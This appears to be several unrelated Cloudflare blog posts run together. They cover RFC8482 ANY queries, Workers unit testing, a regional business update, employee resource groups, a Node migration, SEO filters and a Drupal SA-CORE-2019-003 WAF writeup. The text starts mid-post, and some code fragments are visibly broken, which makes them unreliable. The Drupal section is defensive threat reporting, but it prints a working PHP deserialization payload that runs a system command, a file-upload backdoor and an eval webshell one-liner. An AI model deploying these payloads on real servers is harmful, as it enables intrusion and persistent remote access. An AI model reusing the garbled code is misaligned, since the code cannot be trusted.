"See draft-ietf-dnsop-refuse-any" Our ultimate hero is, which does exactly what the RFC recommends: $ dig ANY ;; ANSWER SECTION: 3600 IN HINFO "RFC8482" "" On our resolver service we stop ANY queries with NOTIMP code. This makes us more confident the resolver isn't used to perform DNS reflections: $ dig ANY @ ;; ->>HEADER<<- opcode: QUERY, status: NOTIMP, id: 14151 The future for developers On the client side, just don't use ANY DNS queries. On the DNS server side - you are allowed to rip out all the gory QTYPE::ANY handling code, and replace it with a top level HINFO message or first RRset found. Enjoy cleaning your codebase! Summary It took the DNS community some time to agree on the specifics, but here we are at the end. RFC8482 cleans up the last remaining DNS meta-qtype, and allows for simpler DNS authoritative and DNS resolver implementations. It finally clearly defines the semantics of ANY queries going through resolvers and reduces the DoS risk for the whole Internet. Not all the effort must go to new shiny protocols and developments, sometimes, cleaning the bitrot is as important. Similar cleanups are being done in other areas. Keep up the good work! We would like to thank the co-authors of RFC8482, and the community scrutiny and feedback. For us, RFC8482 is definitely a good thing, and allowed us to simplify our codebase and make the Internet safer. Mission accomplished! One step at a time we can help make the Internet a better place.

Unit Testing Worker Functions

If you were not aware, Cloudflare Workers lets you run JavaScript in all 165+ of our data centers. We're delighted to see some of the creative applications of Workers. As the use cases grow in complexity, the need to sanity check your code also grows. More specifically, if your Worker includes a number of functions, it's important to ensure each function does what it's intended to do, in addition to ensuring the output of the entire Worker returns as expected.

In this post, we're going to demonstrate how to unit test Cloudflare Workers, and their individual functions, with Cloudworker, created by the Dollar Shave Club engineering team. Dollar Shave Club is a Cloudflare customer, and they created Cloudworker, a mock for the Workers runtime, for testing purposes. We're really grateful to them for this, and they were kind enough to post on our blog about it. This post will demonstrate how to abstract away Cloudworker and test Workers with the same syntax you write them in.

Example Script

Before we get into configuring Cloudworker, let's introduce the simple script we are going to test in our example. As you can see, this script contains two functions, both of which contribute to the response to the client.

addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request))
})

async function addition(a, b) {
  return a + b
}

async function handleRequest(request) {
  const added = await addition(1, 3)
  return new Response(`The Sum is ${added}!`)
}

This script will be active for the route.

Set Up

After creating a new npm project (npm init) in a new directory, I placed my worker.js file inside, containing the above, and created the folder test, which contains worker-test.js. The structure is laid out below.

.
├── worker.js
├── test
│   └── worker-test.js
├── node_modules
├── package.json
└── package-lock.json
Next I need to install Cloudworker (npm install @dollarshaveclub/cloudworker --save-dev) and the Mocha testing framework (npm install mocha --save-dev) if you do not have it installed globally. Make sure that package.json reflects a value of mocha for tests, like:

"scripts": {
  "test": "mocha"
}

Now we can finally write some tests! Luckily, Mocha has async/await support, which is going to make this very simple. The idea is straightforward: Cloudworker allows you to place a Worker in development in front of an HTTP request and inspect the response.

Writing Tests!

Before any test logic, we'll place two lines at the top of the test file (worker-test.js). The first line assigns all property values from Cloudworker and our Worker script to the global context before every async function() is run in Mocha. The second line requires assert, which is commonly used to compare an expected output to a mocked output.

before(async function () {
  Object.assign(global, new (require('@dollarshaveclub/cloudworker'))(require('fs').readFileSync('worker.js', 'utf8')).context);
}); // You will replace worker.js with the relative path to your worker

const assert = require('assert')

Now testing looks a lot more like a Worker itself, as we have access to all the underlying functions used by Cloudworker AND the Worker script.

describe('Worker Test', function() {
  it('returns a body that says The Sum is 4', async function () {
    let url = new URL('')
    let req = new Request(url)
    let res = await handleRequest(req)
    let body = await res.text()
    assert.equal(body, 'The Sum is 4!')
  })

  it('does addition properly', async function() {
    let res = await addition(1, 1)
    assert.equal(res, 2)
  })
})

We can test individual functions within our Worker this way, as shown above with the addition() function call. This is really powerful and allows for more confidence when deploying complex Workers, as you can test each component that makes up the script. We hope this was useful and welcome any feedback.

Reflecting on my first year as Head of Cloudflare Asia

One year into my role as Head of Asia for Cloudflare, I wanted to reflect on what we've achieved, as well as where we are going next. When I started, I spoke about growing our brand recognition in Asia and optimizing our reach to clients by building up teams and channel partners. I also mentioned that a key reason behind my joining was Cloudflare's mission to help build a better Internet and its focus on democratizing Internet tools that were once only available to large companies. I'm delighted to share that we've made great progress and are in a strong position to continue our rapid growth. It's been a wonderful year, and I'm thrilled that I joined the company. There has been a lot going on in our business, as well as in the region. Let's start with Cloudflare Asia.

Cloudflare Asia

Our Singapore team has swelled from 40 people from 11 countries to almost 100 people from 19 nations. Our team is as diverse as our client base and keeps the office lively and innovative.

The Cloudflare Singapore Team

Our Customers

The number of Asian businesses choosing to work with us has more than doubled. You can check out what we've been doing with companies like Carousell, VicRoads, and 9GAG. Our relationships span the region, from India to Japan, from small businesses to large organizations, from startups to governments, and across a wide variety of verticals from e-commerce to financial services.

Our Partners

To further expand our reach, we signed eight new partners representing seven markets and are in discussions with select others. We even held our first partner enablement bootcamp recently, which was a big success.

Our First Partner Bootcamp in Asia

Our Offices

We moved into a larger and wonderful office in Singapore. Customers can come to Frasers Tower to see our Network Operations Center and a stunning view of the city. We celebrated this new office and Asian headquarters opening with two events, presided over by our co-founder and COO, Michelle Zatlyn.
Dignitaries from the Singapore Economic Development Board, the Singapore Cyber Security Association, and the American Embassy cut the ribbon, and hundreds of customers, partners, and friends joined us to kick off the Lunar New Year.

Celebrating our new office opening in February 2019

We have a wonderful community space that we share for meetups. Developers, interest groups, and others from the community are welcome to use it. The first group to take advantage of this was IndoTech, a community of Indonesian professionals living in Singapore who work in tech.

IndoTech meetup at the Cloudflare events space

Going Down Under

Asia is a large region and we are thrilled to expand to Australia. We have many local customers, like Afterpay Touch, Fitness and Lifestyle Group, and the NIB group. We have run Workers-focused meetups in Sydney and Melbourne as part of our Real World Serverless roadshow and shared what we learned about noise on the Internet at AusNOG and NZNOG. Today, we are announcing our expanded Australia presence. Incorporating in a new country is a big step, and we've taken it. This is a good time to mention that we are hiring. If you want to join Cloudflare in Sydney, please get in touch.

Our Network

Cloudflare has 165 data centers around the world. Since I joined a year ago, we've added 46 cities globally, including 15 in APAC. We now have data centers in Pakistan and Vietnam. Around 20% of Cloudflare's globally distributed network is in Asia.

Our Products

We've added a number of great products, which can be found on our blog. Some additions that are especially pertinent to the region include adding UDP capability to Spectrum. Gaming clients typically use custom protocols based on UDP, which legacy systems don't effectively protect, so our expansion of Spectrum has been eagerly received by the many mobile game developers across the region. Indeed, gamers were using Spectrum even prior to this launch.
One example is a mobile game producer whose TCP-based login/authentication servers we protect, mitigating DDoS attacks so the servers stay online and players can log in and play. The world is moving to serverless computing, and Cloudflare is leading the way. Many companies in APAC are at the forefront of this trend and are leveraging Cloudflare to improve their infrastructure. One client is using Cloudflare Workers to speed up and improve the capture rates of their analytics engine.

The Region

From a regional perspective, many countries in Asia are encouraging businesses to be digital-ready. Governments around the region are spearheading programs to help SMEs (small and medium-sized enterprises), corporations, and government departments take advantage of technology and innovation to capture economic gains. For example, Singapore announced SMEs Go Digital as part of the 2017 budget, and Thailand recently launched the Thailand 4.0 initiative.

In addition, one interesting aspect of the Asian market is that a higher percentage of companies use multi-cloud architecture. Whether it's because these companies need to cover different countries where one of the large cloud providers (e.g. AWS, Google Cloud, Microsoft Azure, Alibaba Cloud, or IBM) is stronger than the others, or because they want to avoid vendor lock-in, many companies end up using several cloud compute partners.

The Last Word

Needless to say, it has been an exciting year. I am proud of what we have accomplished and am looking forward to what we have left to do.

Join us

Given all this opportunity for growth, our team in Singapore is hiring! We have roles in Systems Reliability Engineering, Network Engineering, Technical Support Engineering, Solutions Engineering, Customer Success Engineering, Recruiting, Account Executives, Business Development Representatives, Sales Operations, Business Operations, and beyond. Check out our careers page.

Employee resource groups aren't the answer, but they're a first step

Why employee resource groups are important for building a great company culture, but not enough.

Diversity and inclusion is a process. To achieve diversity and inclusion, it's not enough to hire diverse candidates. Once hired, we must be welcomed by a culture of safety and belonging, and our diverse perspectives must be honored by our coworkers. Too many times we are approached by well-meaning companies eager to hire diverse candidates, only to look behind the curtain and discover a company culture where we will not feel safe to be ourselves, and where our perspectives will be ignored. Why would we choose to stay in such an environment? These are the companies where diverse employees leave just as quickly as they join.

Employee Resource Groups (ERGs) are an essential part of diversity and inclusion, especially as companies grow larger. Before being heard, or trying to change someone's mind, you need to feel safe. ERGs serve as a safe haven for those with perspectives and experiences that are "diverse" compared to the company as a whole. They are a place to share stories and particular plights, and a source of stress relief. A place where we can safely show up fully as ourselves, even if at a particular event (like a movie night) no words about these subjects are ever spoken. Even small groups that give the sense of "you belong here" are very much needed and important for building a strong employee community. Having a sense of "I am safe," "I belong," "someone else understands my truth" should be established before any of the other steps. That's where Afroflare comes in here at Cloudflare.

But ERGs alone are not enough. They do not help us feel welcome in a team sync when we are the only person of color. They do not help us feel heard when we are the only diverse perspective in a meeting. Our perspectives need to be incorporated into products, culture, and employee processes - a result which we can call integration.
Without integration, a company will not be able to retain these perspectives. So how does integration start? I believe it starts with empathy.

Numerous articles have been written about empathy, diversity, and inclusion. Empathy, by which I mean understanding the struggles of worldly differences, is hard to practice in a work setting: understanding the struggle of Jim Crow America, or of being a first-generation immigrant, or of how the person you choose to love outside of work can affect your standing in the job market. Some of these struggles have been ingrained into the culture of a people for generations, as familiar to them as apple pie, and yet those experiences are completely unfamiliar to others of us. So what are we to do?

In Brené Brown's book Dare to Lead, she talks about empathy in a very nuanced way. When I read this section, it had a profound effect on me. And though I encourage you to read the whole book, here is the key idea:

We see the world through a set of unique lenses that bring together who we are, where we come from, and our vast experiences. ... One of the signature mistakes with empathy is that we believe we can take our lenses off and look through the lenses of someone else. We can't. Our lenses are soldered to who we are. What we can do, however, is honor people's perspectives as truth even when they're different from ours.[1]

Getting a seat at the table and mustering the courage to share a new perspective is challenging. Mustering the courage to share when it's likely that your truth will not be honored, because you are the only voice with that perspective, is virtually impossible within today's pervasive "data-driven" culture. Having more than one voice to "second" a thought, to value it, gives it more weight than the one lone voice that can so easily be written off as an outlier or a fluke. I'm never going to be able to count on having a second black, straight, cisgender woman from Baltimore in every discussion. More numbers are not the solution.
Honoring people's perspectives as truth even when they're different from ours is hard for all of us. But unless we each do so for one another, none of our individuality can contribute to our work. This doesn't often happen bottom-up. All the employees at a company don't spontaneously decide to honor each other's truths, and only hire those who do the same. It has to come from the top, and it has to be a conscious decision.

This leads me back to why Afroflare (Cloudflare's ERG for people of color) and other ERGs like it are so important. They are the first step towards integration, providing that sense of safety and belonging. Combined with leadership that values this specific kind of empathy, we can create a culture where diversity has the safety it needs to speak up, and the ears it needs to be heard. We're not perfect - no company is - but Cloudflare is consistently making efforts to improve and become a more inclusive workplace for all, starting from our founders down. Cloudflare is also aware of its duty to shed light on our diversity efforts, and to speak up about how we're going to create lasting change in the world by building a better Internet for all.

Empathy is great if you can do it. I urge the readers of this blog to simply honor the diverse perspectives of others as truth, equally alongside their own. We'd all really win if we considered differing perspectives equally, regardless of the majority opinion, as we hire and create solutions, products, and features. It is only then that our workplaces will begin to reflect the true diversity of the world we live in.

Footnote

[1] Brené Brown. Dare to Lead: Brave Work, Tough Conversations, Whole Hearts. Random House, 2018.

Happy Birthday to the World Wide Web!

Today, March 12th, 2019, marks the 30th birthday of the World Wide Web! Cloudflare is helping to celebrate in coordination with the Web Foundation, as part of a 30-hour commemoration of the many ways in which the Web has changed our lives. As we post this blog, Sir Tim Berners-Lee is kicking off his journey of the web at CERN, where he wrote the first web browser. The Web Foundation (@webfoundation) is organizing a Twitter timeline of the web, where each hour corresponds to a year, starting now with 1989 at 00:00 PT / 08:00 CET. We (@cloudflare) will be tweeting out milestones in our history and the web's history, as well as some fun infographics. We hope you will follow the journey on Twitter and contribute your own memories and thoughts to the timeline by tweeting with #Web30 #ForTheWeb. Celebrate with us and support the Web!

A Node to Workers Story

Node.js allows developers to build web services with JavaScript. However, you're on your own when it comes to registering a domain, setting up DNS, managing the server processes, and setting up builds. There's no reason to manage all these layers on separate platforms. For a site on Cloudflare, these layers can live on a single platform. Serverless technology simplifies developers' lives and reframes our current definition of the backend.

In this article I will breeze through a simple example of how converting a former Node server into a Worker untangled a part of my team's code base. The conversion to Workers for this example can be found in this PR on GitHub.

Background

The Cloudflare Marketplace hosts a variety of apps, most of which are produced by third-party developers, but some are produced by Cloudflare employees. The Spotify app is one of those apps, written by the Cloudflare Apps team. This app requires an OAuth flow with Spotify to retrieve the user's token and gather playlists, artists, and other Spotify profile-specific information. While Cloudflare manages the OAuth authentication portion, the app owner - in this case Cloudflare Apps - manages the small integration service that uses the token to call Spotify and formats an appropriate response.

Mysteriously, this Spotify OAuth integration broke. Teams at Cloudflare are keen to remain agile, adaptive, and constantly learning, and the current Cloudflare Apps team no longer comprises the original team that developed the Spotify OAuth integration. As such, the current team had no idea why the app broke. Although we had various alerting and logging systems, the Spotify OAuth server was lost in the cloud. Our first step in tackling the issue was tracking down where exactly the OAuth flow lived. After shuffling through several of the potential platforms - Google Cloud, AWS, DigitalOcean... - we discovered the service was on Heroku. The more platforms introduced, the more complexity in deploys and access management.
I decided to reduce the number of layers in our service by simply creating a serverless Cloudflare Worker: no maintenance, no new logins, and no unique backend configuration. Here's how I did it.

Goodbye Node

The old service used Node.js and Express:'/blah', function(request, response) {

This states that for every POST to the endpoint /blah, execute the callback function with a request and a response object as arguments. Cloudflare Workers are built on top of the Service Workers spec. Instead of mutating the response and calling methods on the response object as in Express, we need to respond to 'fetch' events. The code below adds an event listener for fetch events (incoming requests to the Worker), receiving a FetchEvent as the first parameter. The FetchEvent has a special method called respondWith that accepts an instance of Response, or a Promise which resolves to a Response.

addEventListener("fetch", event => {
  event.respondWith(new Response('Hello world!'));
});

To avoid reimplementing the routing logic in my Worker, I made my own app:

const app = {
  get: (endpoint, fn) => {
    const url = new URL(request.url); // request comes from the enclosing handler's scope
    if (url.pathname === endpoint && request.method === "GET") return fn(request);
    return null;
  },
  post: (endpoint, fn) => {
    const url = new URL(request.url);
    if (url.pathname === endpoint && request.method === "POST") return fn(request);
    return null;
  }
};

Now with app set up, I call app.get(...) in my handler, similar to how I did in Node. I just need to make sure the handler returns the response from the matching route:

async function handleRequest(request) {
  let lastResponse ="/", async function (request) {..});
  if (lastResponse) {
    return lastResponse;
  }

  lastResponse = app.get("/", async function (request) {..});
  if (lastResponse) {
    return lastResponse;
  }
}

Checking lastResponse after each route ensures that we keep trying every endpoint method. The other thing that needs to change is how the response is returned. Before, the return used response.json(), so the final response would be of JSON type.
response.json({
  proceed: false,
  errors: [{ type: '400', message: error.toString() }]
})

In Workers, I need to return a Response instance to the respondWith function. I replaced every instance of response.json or response.sendStatus with a new Response object:

return new Response(
  JSON.stringify({
    proceed: false,
    errors: [{ type: "400", message: res.error }]
  }),
  { headers: { 'Content-Type': 'application/json' } }
)

Now for the most beautiful part of the transition: deleting useless config. Our Express server was set up to export app as a module and insert credentials so that Heroku, or whatever non-serverless server, could pick it up, run, and build. Though I can import libraries for Workers via webpack, for this application it's overkill. Also, I have access to fetch and other native Service Worker functions.

const { getJson } = require('simple-fetch')
module.exports = function setRoutes (app) {

Getting rid of modules and deployment config, I removed the files Procfile, credentials.json, package.json, development.js, heroku.js, and create-app.js. routes.js simply becomes worker.js.

This was a demo of how Workers made my life as a programmer easier. Future developers working with my code can read it without ever looking at any configuration. Even a purely vanilla bean JavaScript developer can come in, since there is no managing builds and pulling hair out. With serverless I can now spend time doing what I love: development.

Diving into Technical SEO using Cloudflare Workers

This is a guest post by Igor Krestov and Dan Taylor. Igor is a lead software developer, and Dan a lead technical SEO consultant who has also been credited with coining the term "edge SEO". Theirs is a technical SEO agency with offices in London, Leeds, and Boston, offering bespoke consultancy to brands around the world. You can reach them both via Twitter.

With this post we illustrate the potential applications of Cloudflare Workers in relation to search engine optimization (more commonly referred to as "SEO"), using our research and testing over the past year making Sloth.

This post is aimed both at readers who are proficient in writing performant JavaScript and at complete newcomers and less technical stakeholders who haven't written many lines of code before.

Endless practical applications to overcome obstacles

Working with various clients and projects over the years we've continuously encountered the same problems and obstacles in getting their websites to a point of "technical SEO excellence".
A lot of these problems come from platform restrictions at an enterprise level, legacy tech stacks, incorrect builds, and years of patching together various services and infrastructures. As a team of technical SEO consultants, we are often left frustrated by these barriers, which can lead to essential fixes and implementations either being impossible or being delayed for months (if not years) at a time - and in that time, the business is often losing traffic and revenue.

Workers offers us a Hail Mary solution to a lot of common frustrations in getting technical SEO implemented, and we believe in the long run it can become an integral part of overcoming legacy issues, reducing DevOps costs, and speeding up lead times, all on a globally distributed serverless platform with blazing fast cold start times.

Creating accessibility at scale

When we first started out, we needed to implement simple redirects, which should be easy to create on the majority of platforms but wasn't supported in this instance. When the second barrier arose, we needed to inject hreflang tags, cross-linking an old multi-lingual website on a bespoke platform built to an outdated spec. This required experiments to find an efficient way of implementing the tags without increasing latency or adding new code to the server - in a manner befitting search engine crawling.

At this point we had a number of other applications for Workers, with an arising need for non-developers to be able to modify and deploy new Worker code. This has since become an idea of Worker code generation, via a web UI or command line. Having established a number of different use cases for Workers, we identified 3 processing phases:

- Incoming request modification - changing the origin request URL or adding authorization headers.
- Outgoing response modification - adding security headers, hreflang header injection, logging.
- Response body modification - injecting/changing content, e.g.
canonicals, robots meta tags, and JSON-LD.

We wanted to generate lean Worker code that keeps each piece of functionality contained and independent of the others, and went with the idea of filter chains, which can be used to compose fairly complex request processing.

A request chain depicting the path of a request as it is transformed while moving from client to origin server and back again.

A key accessibility issue we identified, from a non-technical perspective, was the goal of making this serverless technology accessible to everyone in SEO, because with understanding comes buy-in from stakeholders. In order to do this, we had to make Workers:

- Accessible to users who don't know how to write JavaScript, or performant JavaScript
- Implementable in a way that complements existing deployment processes
- Implementable securely (internally and externally)
- Implementable in compliance with data and privacy policies
- Verifiable through existing processes and practices (BAU)

Before we dive into actual filters, here are partial TypeScript interfaces to illustrate the filter APIs:

interface FilterExecutor<Type, Context, ReturnType extends Type | void> {
  apply(filterChain: { next: (c: Context, obj: Type) => ReturnType | Promise<ReturnType> }, context: Context, obj: Type): ReturnType | Promise<ReturnType>;
}

interface RequestFilterContext {
  // Request URL
  url: URL;
  // Short-circuit request filters
  respondWith(response: Response | Promise<Response>): void;
  // Short-circuit all filters
  respondWithAndStop(response: Response | Promise<Response>): void;
  // Add additional response filter
  appendResponseFilter(filter: ResponseFilter): void;
  // Add body filter
  appendBodyFilter(filter: BodyFilter): void;
}

interface RequestFilter extends FilterExecutor<Request, RequestFilterContext, Request> {};

interface ResponseFilterContext {
  readonly startMs: number;
  readonly endMs: number;
  readonly url: URL;
  waitUntil(promise: Promise<any>): void;
respondWith(response: Response | Promise<Response>): void; respondWithAndStop(response: Response | Promise<Response>): void; appendBodyFilter(filter: BodyFilter): void; } interface ResponseFilter extends FilterExecutor<Response, ResponseFilterContext, Response> { }; interface BodyFilterContext { waitUntil(promise: Promise<any>): void; } interface ChunkChain { public next: ChunkChain | null; public chunk: Uint8Array; } interface BodyFilter extends MutableFilterExecutor<ChunkChain | null, BodyFilterContext, ChunkChain | null> { }; Request filter — Simple RedirectsFirstly, we would like to point out that this is very niche use case, if your platform supports redirects natively, you should absolutely do it through your platform, but there are a number of limited, legacy or bespoke platforms, where redirects are not supported or are limited, or are charged for (per line) by your hosting or platform. For example, Github Pages only support redirects via HTML refresh meta tag. The most basic redirect filter, would look like this:class RedirectRequestFilter { constructor(redirects) { this.redirects = redirects; } apply(filterChain, context, request) { const redirect = this.redirects[context.url.href]; if (redirect) context.respondWith(new Response('', { status: 301, headers: { 'Location': redirect } })); else return, request); } } const { requestFilterHandle } = self.slothRequire('./worker.js'); requestFilterHandle.append(new RedirectRequestFilter({ "": "" })); You can see it live in Cloudflare’s playground here.The one implemented in Sloth supports basic path matching, hostname matching and query string matching, as well as wildcards.The Sloth dashboard for visually creating and modifying redirects. It is all well and good when you do not have a lot of redirects to manage, but what do you do when size of redirects starts to take up significant memory available to Worker? 
This is where we faced another scaling issue: going from a small handful of possible redirects to tens of thousands.

Managing Redirects with Workers KV and Cuckoo Filters

Here is one way to solve it, using Workers KV – a key-value data store. Instead of hard-coding redirects inside the Worker code, we store them in Workers KV. A naive approach would be to do a KV lookup for every URL, but Workers KV does not reach maximum read performance until a key is being read on the order of once per second in any given data center, so rarely-read redirect keys would be slow to look up.

An alternative is a probabilistic data structure, such as a Cuckoo Filter, stored in KV – possibly split between a couple of keys, as KV values are limited to 64KB. Such a filter flow would be:

1. Retrieve the frequently read filter key(s).
2. Check whether the full URL (or just the pathname) is in the filter.
3. If it is, get the redirect from Workers KV using the URL as the key.

In our tests, we managed to pack 20 thousand redirects into a Cuckoo Filter taking up 128KB, split between 2 keys, and verified it against 100 thousand active URLs with a false-positive rate of 0.5-1%.

Body filter - Hreflang Injection

Hreflang meta tags need to be placed inside the HTML <head> element, so before actually injecting them, we need to find either the start or the end of the head tag – which is, in itself, a streaming search problem. The caveat here is that the naive method – decoding UTF-8 into a JavaScript string, performing the search, and re-encoding back into UTF-8 – is fairly slow. Instead, we attempted a pure JavaScript search on byte strings (Uint8Array), which straight away showed promising results.
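The three-step flow above can be sketched as follows. This is an illustrative sketch only, not Sloth's actual code: the packed cuckoo filter is mocked with an exact `Set`, the KV namespace with a `Map`, and all names and URLs are ours. `'/old-blog'` is staged as a false positive – it passes the filter but has no KV entry, exactly the case a real cuckoo filter produces at a 0.5-1% rate.

```javascript
// Mock of the packed cuckoo filter retrieved from KV (step 1).
const filter = new Set(['/old-page', '/old-blog']);
// Mock of a Workers KV namespace binding holding the actual redirect map.
const kv = new Map([['/old-page', '']]);

function mightRedirect(pathname) {
  // Step 2: cheap in-memory membership test; may rarely report a false positive.
  return filter.has(pathname);
}

async function lookupRedirect(pathname) {
  if (!mightRedirect(pathname)) return null; // most requests stop here, no KV read
  // Step 3: only filter hits pay the cost of a KV read.
  return (await kv.get(pathname)) ?? null;   // null on a false positive
}
```

A real deployment would replace the mocks with a deserialized cuckoo filter and a KV `get()` call, but the shape of the flow is the same.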
For our use case, we picked the Boyer-Moore-Horspool algorithm as the base of our streaming search, as it is simple, has great average-case performance, and only requires preprocessing the search pattern, with manual prefix/suffix matching at chunk boundaries. Here is a comparison of the methods we tested on Node v10.15.0:

| Chunk Size | Method | Ops/s |
|------------|--------------------------------------|---------------------|
| 1024 bytes | Boyer-Moore-Horspool over byte array | 163,086 ops/sec |
| 1024 bytes | **precomputed BMH over byte array** | **424,948 ops/sec** |
| 1024 bytes | decode utf8 into strings & indexOf() | 91,685 ops/sec |
| 2048 bytes | Boyer-Moore-Horspool over byte array | 119,634 ops/sec |
| 2048 bytes | **precomputed BMH over byte array** | **232,192 ops/sec** |
| 2048 bytes | decode utf8 into strings & indexOf() | 52,787 ops/sec |
| 4096 bytes | Boyer-Moore-Horspool over byte array | 78,729 ops/sec |
| 4096 bytes | **precomputed BMH over byte array** | **117,010 ops/sec** |
| 4096 bytes | decode utf8 into strings & indexOf() | 25,835 ops/sec |

Can we do better?

Having achieved a decent performance improvement over the naive method with a pure JavaScript search, we wanted to see whether we could do better. As Workers support WASM, we used Rust to build a simple WASM module, which exposed the standard Rust string search.

| Chunk Size | Method | Ops/s |
|------------|-------------------------------------|---------------------|
| 1024 bytes | Rust WASM | 348,197 ops/sec |
| 1024 bytes | **precomputed BMH over byte array** | **424,948 ops/sec** |
| 2048 bytes | Rust WASM | 225,904 ops/sec |
| 2048 bytes | **precomputed BMH over byte array** | **232,192 ops/sec** |
| 4096 bytes | **Rust WASM** | **129,144 ops/sec** |
| 4096 bytes | precomputed BMH over byte array | 117,010 ops/sec |

As the Rust version did not use a precomputed search pattern, it should be significantly faster still if we precomputed and cached the search patterns.
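For illustration, here is a minimal precomputed-BMH byte search in the spirit of the variant benchmarked above. This is our own sketch, not the code used in Sloth, and it assumes patterns shorter than 256 bytes (the skip table is a `Uint8Array`; use a `Uint16Array` for longer patterns).

```javascript
// Boyer-Moore-Horspool over raw bytes, with the skip table built once per
// pattern (the "precomputed BMH" variant in the tables above).

function compilePattern(pattern) { // pattern: Uint8Array, length < 256
  const skip = new Uint8Array(256).fill(pattern.length);
  for (let i = 0; i < pattern.length - 1; i++) {
    // distance from each byte (except the last) to the end of the pattern
    skip[pattern[i]] = pattern.length - 1 - i;
  }
  return { pattern, skip };
}

function search(haystack, { pattern, skip }) { // haystack: Uint8Array
  const m = pattern.length;
  let i = 0;
  while (i + m <= haystack.length) {
    let j = m - 1;
    while (j >= 0 && haystack[i + j] === pattern[j]) j--;
    if (j < 0) return i;            // match found at offset i
    i += skip[haystack[i + m - 1]]; // shift by the last byte of the window
  }
  return -1;                        // no match in this chunk
}
```

A body filter would call `search` on each chunk, carrying over the last `m - 1` bytes of the previous chunk to handle matches that straddle chunk boundaries, as noted above.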
In our case, we were searching for a single pattern and stopping once it was found, so the pure JavaScript version was fast enough; but if you need multi-pattern or more advanced search, WASM is the way to go.

We could not record a statistically significant change in latency between a basic Worker and one with a body filter deployed to production, due to unstable network latency, with a mean response latency of 150ms and a 10% standard deviation at the 90th percentile.

What’s next?

We believe that Workers and serverless applications can open up new opportunities to overcome a lot of the issues faced by the SEO community when working with legacy tech stacks, platform limitations, and heavily congested development queues.

We are also investigating whether Workers can allow us to build a more efficient Tag Manager, which bundles and pushes only the matching tags with their code, to minimise the number of external requests caused by trackers and thus reduce the load on the user’s browser.

You can experiment with Cloudflare Workers yourself through Sloth, even if you don’t know how to write JavaScript.

Stopping Drupal’s SA-CORE-2019-003 Vulnerability

On the 20th of February 2019, Drupal announced that they had discovered a severe vulnerability and that they would be releasing a patch for it the next day. Drupal is a Content Management System used by many of our customers, which made it important that our WAF protect against the vulnerability as quickly as possible.

As soon as Drupal released their patch, we analysed it to establish what kind of payloads could be used against it, and put together WAF rules to protect Cloudflare customers running Drupal. We identified the type of vulnerability we were dealing with within 15 minutes, and from there we were able to deploy rules to block the exploit well before any real attacks were seen.

The exploit

As Drupal's release announcement explains, a site is affected if:

- It has the Drupal 8 RESTful API enabled, or
- It uses one of the 8 modules found to be affected

From looking at the patch, we very quickly realised the exploit would be based on deserialization. The option ['allowed_classes' => FALSE] was added as part of the patch to the link and map field types. This indicates that while these items are supposed to receive some serialized PHP, there was no legitimate case for supplying a serialized PHP object. This is important because the easiest way to exploit a deserialization vulnerability in PHP is to supply a serialized object that is crafted to execute code when deserialized. Making the situation worse was the fact that the deserialization was performed regardless of any authentication.

We also realised that this meant blindly blocking all serialized PHP would break the intended functionality, as these fields are clearly supposed to receive specific kinds of serialized PHP, for example arrays or strings.
Although, as the PHP documentation notes, it’s always risky to deserialize untrusted data, even when restricting the set of data that’s accepted. This blog post from Ambionics does a good job of explaining what a concrete exploitation of the vulnerability looks like when applied to the Drupal 8 RESTful API.

What we caught

After the vulnerability was announced, we created several rules to experiment with different ways to build a signature that would catch exploit attempts. Within an hour of the Drupal announcement we had deployed these in simulate mode, which logs potentially malicious requests without blocking them. We monitored for false positives and refined the rules several times as we tuned them.

This culminated in the deployment of rule D0020, which has blocked a number of attackers, as shown in the graph below. The rule was already deployed in ‘drop’ mode by the time our first attack was observed, at around 7pm UTC on Friday the 22nd of February 2019 – less than 48 hours after the announcement from Drupal – and to date it has matched zero false positives.

Figure 1: Hits on rule D0020, with the first attack seen on the 22nd of February 2019.

These first attacks leveraged the “guzzle/rce1” gadget from phpggc to invoke the Linux command “id” via PHP’s “system” function, exactly as Ambionics did:

O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:"GuzzleHttp\Psr7\FnStreammethods";a:1:{s:5:"close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:"GuzzleHttp\HandlerStackhandler";s:2:"id";s:30:"GuzzleHttp\HandlerStackstack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"GuzzleHttp\HandlerStackcached";b:0;}i:1;s:7:"resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}

After this we saw several more attempts to use this gadget to execute various payloads, mostly to test whether targeted servers were vulnerable.
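To make the object-vs-array distinction above concrete, a naive signature might look like the following. This is purely our own illustration – not Cloudflare's actual rule D0020, which must also handle encodings and obfuscation – showing how serialized PHP objects can be flagged while serialized arrays and strings pass.

```javascript
// Naive illustration: serialized PHP objects start with O:<len>:"<class>":<n>:{
// while serialized arrays (a:...) and strings (s:...) do not.
const serializedPhpObject = /O:\d+:"[^"]*":\d+:\{/;

function looksLikeObjectInjection(body) {
  return serializedPhpObject.test(body);
}
```

Against the guzzle/rce1 payload shown above this matches on the leading `O:24:"GuzzleHttp\Psr7\FnStream":2:{`, while a legitimate serialized array such as `a:1:{i:0;s:3:"foo";}` is left alone.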
Things like ‘phpinfo’, echoing strings, and performing calculations.

The first malicious payload we saw used the same gadget, but this time to save a malicious script from Pastebin onto the target server via wget -O 1x.php. The script would have placed a backdoor on the target system by allowing the attacker to upload files to the server via an HTML form. This would have given the attacker continued access to the system even if it was subsequently patched.

```
<? echo "'XXXXXXXXXXXX"; $cwd = getcwd();
Echo '<center>
<form method="post" target="_self" enctype="multipart/form-data">
<input type="file" size="20" name="uploads" />
<input type="submit" value="upload" />
</form>
</center></td></tr> </table><br>';
if (!empty ($_FILES['uploads'])) {
    move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
    Echo "<script>alert('upload Done'); </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>
```

Another malicious payload seen was much more minimal:

echo '<?php @eval($_POST['pass']) ?>' > vuln1.php

This payload creates a small PHP file on the server containing the dangerous eval() function. If it hadn’t been blocked, it would have allowed the attacker to execute arbitrary commands on the vulnerable system via a single HTTP request to the vuln1.php file.

Rates of exploitation

The pattern we saw here is fairly typical of a newly announced vulnerability. Once a vulnerability is published, it doesn’t take long to see real attackers making use of it – initially in small numbers with “test” payloads to identify whether the attacks work, but shortly afterwards in much higher numbers, and with more dangerous and subtle payloads.
